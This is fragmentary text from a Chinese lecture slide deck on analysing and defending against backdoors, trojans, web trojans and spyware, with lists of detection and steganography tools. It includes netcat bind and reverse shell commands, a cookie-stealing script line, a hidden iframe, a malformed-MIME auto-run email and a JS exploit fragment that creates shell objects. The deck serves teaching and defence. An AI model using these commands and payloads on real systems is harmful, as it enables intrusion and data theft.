5-back-door

2019/9/14,1,恶意软件（病毒）的分析与防范 Defence & analysis of malware,计算机学院 傅建明 F,2019/9/14,2,后门,后门是一个允许攻击者绕过系统中常规安全控制机制的程序，他按照攻击者自己的意图提供通道。 后门的重点在于为攻击者提供进入目标计算机的通道。,2019/9/14,3,后门的类型,本地权限的提升 对系统有访问权的攻击者变换其权限等级成为管理员，然后攻击者可以重新设置该系统或访问人和存储在系统中的文件。 单个命令的远程执行 攻击者可以向目标计算机发送消息。每次执行一个单独的命令，后门执行攻击者的命令并将输出返回给攻击者。 远程命令行解释器访问 正如远程Shell，这类后门允许攻击者通过网络快速直接地键入受害计算机的命令提示。其比“单个命令的远程执行”要强大得多。 远程控制GUI 攻击者可以看到目标计算机的GUI，控制鼠标的移动，输入对键盘的操作，这些都通过网络实现。,2019/9/14,4,后门的安装,自己植入（物理接触或入侵之后） 通过病毒、蠕虫和恶意移动代码 欺骗受害者自己安装 Email 远程共享 BT下载 ,2019/9/14,5,后门举例,NetCat：通用的网络连接工具 用法一： nc l p 5000 e cmd.exe nc 5000 用法二： nc l p 5000 nc 5000 e cmd.exe cshell.exe,2019/9/14,6,其他Windows下的后门程序,CryptCat Tini 提供通向Tcp端口7777，只有3K。 ,2019/9/14,7,2019/9/14,8,无端口后门-如何唤醒,ICMP后门 不使用TCP/UDP协议。 使用ICMP协议进行通信。 难以检测。 非混合型探测后门攻击者将触发指令发送到对方计算机。 难以检测。(Cd00r: syn to port x, syn to port y, syn to port z) 混合型探测后门 只要攻击者将触发指令发送到对方网络中即可触发后门。 更加难以检测。 (syn to port x , syn to port x, syn to port x in different Ips),2019/9/14,9,Bits-glacier,进程管理器中看不到 平时没有端口，只是在系统中充当卧底的角色 提供正向连接和反向连接两种功能 仅适用于Windows2000/XP/2003 具体用法和例子可以查看“难以觉察的后门-BITS”一文,2019/9/14,10,GUI(Graphics User Interface)远程控制,并非所有的GUI远程控制都是恶意的 VNC(Virtual Network Computing) Windows Terminal Services PCAnywhere Back Orifice 2000 SubSeven,2019/9/14,11,VNC,英国剑桥大学AT&T实验室在2002年开发的轻量型的远程控制计算机软件，任何人都可免费取得该软件。 VNC软件主要由两个部分组成： VNC server及VNC viewer。 VNC server 与 VNC viewer 支持多种操作系统，如 windows，Linux，MacOS 及 Unix 系列（Unix，Solaris等），因此可将 VNC server 及 VNC viewer 分别安装在不同的操作系统中进行控制。 也可以通过一般的网络浏览器（如 IE 等）来控制被控端（需要 Java 虚拟机的支持）。,2019/9/14,12,VNC程序举例,2019/9/14,13,后门的启动,感染普通执行文件或系统文件 添加程序到“开始”-“程序”-“启动”选项 修改系统配置文件win.ini、system.ini、wininit.ini、winstart.bat、autoexec.bat等的相关启动选项 通过修改注册表启动键值 修改文件关联的打开方式 添加计划任务 利用自定义文件夹风格 注册为Internet Explorer的 BHO (Browser Helper Object)组件 具体请参考“Windows的自启动方式 ”一文。,2019/9/14,14,检测Windows后门启动技术,手工检测 注册表启动键值 启动选项 关联方式 计划任务 利用工具检测 Msconfig AutoRuns /Utilities/Autoruns.html 完整性检测程序（GFI LANguard System Integrity Monitor, Ionx Data Sentinel）,2019/9/14,15,AutoRuns的运行界面,2019/9/14,16,如何防御后门 -普通后门,培养良好的安全意识和习惯。 使用网络防火墙封锁与端口的连接。 仅允许最少数量的端口通信通过防火墙 天网个人防火墙，瑞星防火墙，江民黑客防火墙，Zone Alarm，Norton Personal Firewall 经常利用端口扫描器扫描主机或端口查看工具查找本地端口监听程序。 Nmap，Xscan，NC，Fport，TcpView，IceSword,2019/9/14,17,如何防御后门 -无端口后门,查找不寻常的程序 查找不寻常的进程 利用基于网络的IDS查找隐蔽的后门命令，如Snort。 检测本地和网络中的混杂模式的网卡 本地检测嗅探器（Promiscdetect.exe） 远程检测嗅探器（Sentinel,AntiSniff）,2019/9/14,18,2. 特洛伊木马,特洛伊木马是一个程序，他看起来具有某个有用的或善意的目的，但是实际上掩盖着一些隐藏的恶意功能。 欺骗用户或者系统管理员安装 在计算机上与“正常”的程序一起混合运行，将自己伪装得看起来属于该系统。,2019/9/14,19,后门 VS 特洛伊木马,如果一个程序仅仅提供远程访问，那么它只是一个后门。 如果攻击者将这些后门功能伪装成某些其他良性程序，那么就涉及到真正的特洛伊木马。,2019/9/14,20,特洛伊木马,木马系统软件一般由木马配置程序、控制端程序和木马程序(服务器程序)等三部分组成。 木马程序，也称服务器程序，它驻留在受害者的系统中，非法获取其操作权限，负责接收控制端指令，并根据指令或配置发送数据给控制端。 木马配置程序设置木马程序的端口号、触发条件、木马名称等，使其在服务端藏得更隐蔽，有时该配置功能被集成在控制端程序菜单内，不单独作为一个程序。 控制端程序控制远程服务器，有些程序集成了木马配置的功能。,2019/9/14,21,2019/9/14,22,2.1名字欺骗,修改文件的文件名以欺骗用户 与Windows扩展名放在一起 Beauty.jpg .exe 模仿其他文件名 httpd,iexplore,notepad,ups,svchost 不能用“任务管理器”删除的进程名 Csrss.exe,services.exe,smss.exe,winlogon.exe,system,system idle process 路径威胁 如将木马命名为explorer.exe放在C:下。,2019/9/14,23,对命名陷阱的防御,确定指定进程属于哪个程序 Fport,icesword,tcpview 使用杀进程工具进行查杀 Pskill,icesword,2019/9/14,24,2.2 文件捆绑,恶意程序与正常程序捆绑 捆绑工具 EXE捆绑机,Wrappers,binders,EXE binders CHM, Flash. 压缩软件（winrar） WinRMSetup30.exe 防御 使用反病毒软件进行检测，并及时更新病毒库。,2019/9/14,25,2.3软件下载,从网上下载的软件是你真正需要的软件吗？ 从网上下载的软件是否被恶意修改过？ 防御措施 用户注意 完整性检测（如MD5,FileChecker） 小心测试新软件,2019/9/14,26,2.4 软件本身带毒,内部员工注入恶意代码 软件开发的全球化趋势 多个部门联合开发软件，一层层的外包,2019/9/14,27,2.5 Html传播,网页病毒的传播方式 Flash传播网页 email传播网页 Chm 传播网页木马 Exe2bmp 正常网页中携带,2019/9/14,28,网页病毒的传播方式,1-美丽的网页名称，以及利用浏览者的无知. URL1: /images/mm/plmm001.gif URL2: /images/mm/plmm001.gif,2019/9/14,29,plmm001.gif,2019/9/14,30,Flash传播网页,用Flash MX制作： 第一帧，打开动作面板，进入 ActionsBrowerNetWorkGetUrl http:/网页木马地址， windows:_self 第二帧， ActionsBrowerNetWorkloadmovie http:/*.swf,2019/9/14,31,email传播网页,1. Window.open(“/info.asp?msg=+document.cookie”) 2. ,2019/9/14,32,email传播网页,3. 4. 5 ,2019/9/14,33,email传播网页,2019/9/14,34,Chm 传播网页木马,x.htm： or Easy CHM or Quick chm 把x.htm和x.exe生成x.chm,2019/9/14,35,exe2bmp,exe2bmp可以将一个.exe可执行文件生成同名的.bmp、.asp、.htm三个文件。将这三个文件放到支持ASP的空间里边，当别人打开.htm网页文件的时候，先前的.exe木马将被自动下载到对方的硬盘并运行。 For example x.exe produce:x.bmp; x.asp; x.htm,2019/9/14,36,x.htm, 数据装载中，可能需要10秒至30秒 ,2019/9/14,37,x.asp,1-在cache中寻找1.bmp 2-把bmp还原为exe 3-执行exe,2019/9/14,38,正常网页中携带, Window.open Onload, onerror ,2019/9/14,39,网页病毒、网页木马的原理,Javascript.Exception.Exploit ：JS+WSH 错误的MIME Multipurpose Internet Mail Extentions，多用途的网际邮件扩充协议头. IE5.0到IE6.0 EXE to .BMP + Javascritp.Exception.Exploit iframe 漏洞的利用：父窗口能在子域环境下运行脚本代码，包括任意的恶意代码 通过安全认证的CAB,COX EXE文件的捆绑,2019/9/14,40,Javascript.Exception.Exploit,Function destroy()try a1=document.applets0; a1.setCLSID(“F935DC22-1CF0-11D0-ADB9-00C04FD58A0B“); a1.createInstance(); Shl = a1.GetObject(); a1.setCLSID(“0D43FE01-F093-11CF-8940-00A0C9054228“); a1.createInstance(); FSO = a1.GetObject(); a1.setCLSID(“F935DC26-1CF0-11D0-ADB9-00C04FD58A0B“); a1.createInstance(); Net = a1.GetObject(); try do something; catch(e) catch(e) function do() setTimeout(“destroy()“, 1000); /设定运行时间1秒 do() /坏事执行函数指令,2019/9/14,41,错误的MIME Multipurpose Internet Mail Extentions,Content-Type: multipart/related; type=“multipart/alternative“; boundary=”=B=“ -=B= Content-Type: multipart/alternative; boundary=”=A=“ -=A= Content-Type: text/html; Content-Transfer-Encoding: quoted-printable -=A=- -=B= Content-Type: audio/x-wav; name=”run.exe“ -可以改为其他脚本文件 Content-Transfer-Encoding: base64 Content-ID: -以下省略AAAAA N+1个-,当申明邮件 的类型为audio/x-wav时，IE存在的一个漏洞会将附件认为是音频文件自动尝试打开,2019/9/14,42,iframe,iframe src=run.eml width=0 height=0/iframe,2019/9/14,43,Startup.html, startup document.getElementById(“clientcall“).click() ,2019/9/14,44,HTA的全名为HTML Application, 参见x.asp,2019/9/14,45,各种溢出型漏洞,iframe溢出 Javaprxy.DLL COM对象堆溢出漏洞 /vuls/200507/4055.html,2019/9/14,46,木马的发展,加入Rootkit,隐藏文件/端口/服务/进程等 HTTP隧道 HyDan(把信息隐藏在二进制文件中) ,2019/9/14,47, “) Then% “ & szTempFile, 0, True)% “ method=“POST“ “ ,2019/9/14,48,木马检测工具,安天实验室：木马防线 ,功能介绍,2019/9/14,49,木马防线2005+,2019/9/14,50,木马克星,木马克星可以查杀8122种国际木马,1053种密码偷窃木马,保证查杀传奇密码偷窃木马,灰鸽子API反杀病毒软件类木马,冰河类文件关联木马,密码解霸,奇迹射手等游戏密码邮寄木马,内置木马防火墙,任何黑客程序试图发送密码邮件,都需要Iparmor 确认,不仅可以查杀木马,更可以反查黑客密码。,2019/9/14,51,间谍软件,他们以主动收集用户个人信息、相关机密文件或隐私数据为主，搜集到的数据会主动传送到指定服务器。,2019/9/14,52,间谍软件发展之初，多被一些在线广告商以及Kazaa等音乐交换网站使用，这些公司将一些监控程序放在用户电脑内监视其网上行为、收集其兴趣爱好，或者在空闲时间进行其它操作。 这些公司以让用户上网免费赚钱或免费获得音乐为幌子，吸引了众多用户下载，而这些软件中所带的间谍程序便悄悄地收集用户信息，然后根据这些信息发送广告，或者把这些收集的信息转卖给其他广告公司获取利益。,2019/9/14,53,间谍软件的传播方式,软件捆绑和嵌套 浏览网站（恶意网页或网页木马） 邮件发送 利用漏洞进行主动传播和植入（多隐身于蠕虫之中）。,2019/9/14,54,部分间谍和广告软件,CoolWebSearch：可能是最下流也最恶毒的程序之一。它完全劫持了IE浏览器，害你什么事都做不成。 PurityScan，一个显示弹出广告，声称可以发现并删除个人电脑上的色情内容的程序。 Transponder (vx2)，一个IE“浏览器助手”，它能够监控网络浏览并发送相关广告。 KeenValue是一个广告程序，它收集个人信息并向计算机用户发送广告。 Perfect Keylogger一个记录所访问过的站点、击键的记录和鼠标的移动的工具。它记录下用户的口令和账户等信息。,2019/9/14,55,Continue,HotBar(BHO) A better Internet,2019/9/14,56,发展趋势,逐渐融合了各种病毒、蠕虫、木马、甚至Rootkit的技术和特点，无处不在，危害特别巨大。 其会变得越来越普遍，越来越复杂。 功能越来越就有针对性和目的性。 自我隐藏技术则会越来越先进。 这将给间谍软件的检测带来巨大挑战。,2019/9/14,57,间谍软件检测工具,1.Spybot Search and Destroy(简称：SpyBot S&D)：能扫描你的硬盘，然后找出你硬盘里面的广告和间谍程序，然后把这些会对你的电脑产生危害的程序移除，支持常用的所有浏览器。 2.Spy Sweeper：让你免受间谍软件的影响，它能在你浏览网页，浏览邮件，下载软件的时候给予你充足的保护，免受间谍软件的入侵，保护个人的信息。,2019/9/14,58,间谍软件检测工具,3.Spyware Doctor：是一个先进的间谍软件、广告软件公用程序，它可以检查并从你的电脑移走间谍软件、广告软件、木马程序、键盘记录器和追踪威胁。 4.SpyRemover：专门为清除悄悄安装在你的电脑里的间谍程序而设计的一个计算机网络安全工具。它可以帮助你快速的在系统组件中搜索已知的间谍程序的踪迹，并可以帮助你安全的清除他们。全面保护你的网络安全。支持多国语言。,2019/9/14,59,间谍软件检测工具,5.微软：AntiSpyware。 6. McAfee企业版反间谍软件。 其可有效侦测及降低遭受间谍程序(spyware)、广告软件(adware)、色情拨号程序(dialers)、键盘记录软件(keyloggers)、cookies文件和远程控制程序等潜在恶意程序(PUPs)的袭击。,2019/9/14,60,Question？,2019/9/14,61,Hide information in a file,Blindside (Freeware) - Uses BMP carrier files and includes encryption. BMP Secrets (Freeware) - Uses BMP carrier files and includes encryption. Cameleon (Freeware) - French language tool that uses GIF carrier files and includes encryption. Camera/Shy v (Freeware) - Scans for and delivers decrypted content from the Internet. Camouflage (Freeware) - Can hide information in any digital file type by inserting it after the end of file marker. Information hidden this way will not affect how the carrier looks or behaves, although it will increase file size. Includes password protection. Contraband Hell Edition (Freeware) - Uses BMP carrier files and includes encryption. Courier v1.0a (Freeware) - Uses BMP carrier files. CryptArkan (Shareware) - Uses WAV and BMP carrier files; hidden data can be directly read off an audio CD. Includes encryption. Data Privacy Tools (Freeware) Uses BMP carrier files and includes encryption.,2019/9/14,62,Hide information in a file,Data Stash (Shareware) - Uses BMP and database carrier files and includes password protection. Digital Picture Envelope v1.0 (Freeware) - Uses BMP carrier files. Encrypt Pic (Shareware) - Uses 24-bit BMP carrier files and includes encryption. Gif-it-Up (Freeware) - Uses GIF carrier files and includes encryption. Gifshuffle v2.0 (Freeware) - A command-line tool that uses GIF carrier files and includes encryption. Hermetic Stego (Shareware) - Uses BMP carrier files. The developers claim their stego key makes the payload undetectable. Hide and Seek for Win95 (Shareware) - Uses BMP carrier files and includes encryption and file wiping. Hide4PGP v2.0 (Freeware) - A command-line tool that uses BMP, WAV, and VOC carrier files. Hide In Picture 2.0 (Freeware) - USes BMP carrier files and includes encryption. ImageHide (Freeware) - Uses a variety of image carrier files. In Plain View (Freeware) - Uses BMP carrier files and includes password protection. In The Picture (Shareware) - Uses BMP carrier files and includes encryption.,2019/9/14,63,InfoStego (Freeware)- Uses BMP carrier files; includes encryption. Invisible Secrets v4.0 (Shareware) - Uses JPEG, PNG, BMP, HTML and WAV carrier files. Includes encryption, shredder, password manager and self-decrypting archives. JPegX (Freeware) - Uses JPEG carrier files and includes encryption and password protection. JP Hide and Seek (Freeware) - Uses JPEG carrier files and includes encryption. JSteg Shell v2.0 (Freeware) - Uses JPEG carrier files; includes encryption. MP3Stego (Freeware) - Uses MP3 carrier files. PGPn123 (Freeware) - A tool that facilitates using PGP for Eudora, Agent, or Pegasus Mail and also includes a steganography option. PhotoCrypt 1.1 (Freeware) - Uses BMP carrier files. Sams Big Play